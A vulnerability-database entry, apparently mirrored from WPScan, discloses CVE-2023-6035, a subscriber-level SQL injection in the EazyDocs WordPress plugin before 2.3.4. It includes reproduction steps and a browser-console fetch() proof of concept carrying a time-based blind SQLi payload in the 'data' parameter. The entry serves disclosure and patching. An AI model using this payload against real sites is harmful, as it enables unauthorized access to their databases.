Lucene search
Dao Xuan HieuWPEX-ID:44F5A29A-05F9-40D2-80F2-6FB2BDA60D79HistoryNov 20, 2023 - 12:00 a.m.
EazyDocs < 2.3.4 - Subscriber + SQLi
2023-11-2000:00:00
Dao Xuan Hieu
66
eazydocs
sql injection
subscriber
exploit
security vulnerability
Description The plugin does not properly sanitize and escape “data” parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.
1. Create a document then create some sections in the document
2. Log in as Subscriber
3. Paste the following script in the browser's console, and notice it hangs for 5 seconds, indicating the injection succeeded:
```
await fetch("/wp-admin/admin-ajax.php", {
"credentials": "include",
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=eaz_nestable_docs&data=%5b%7b%22id%22%3a%2286'and(select*from(select(sleep(5)))a)%23%22%7d%5d",
"method": "POST",
"mode": "cors"
});
```Related
wpvulndb
wpvulndb
EazyDocs < 2.3.4 - Subscriber + SQLi
2023-11-20 00:00:00
nvd
nvd
CVE-2023-6035
2023-12-11 20:15:07
cvelist
cvelist
CVE-2023-6035 EazyDocs < 2.3.4 - Subscriber + SQLi
2023-12-11 19:22:37
prion
prion
Sql injection
2023-12-11 20:15:00
cve
cve
CVE-2023-6035
2023-12-11 20:15:07
AI Score
7.6
Confidence
Low
EPSS
0.001
Percentile
19.3%
Related for WPEX-ID:44F5A29A-05F9-40D2-80F2-6FB2BDA60D79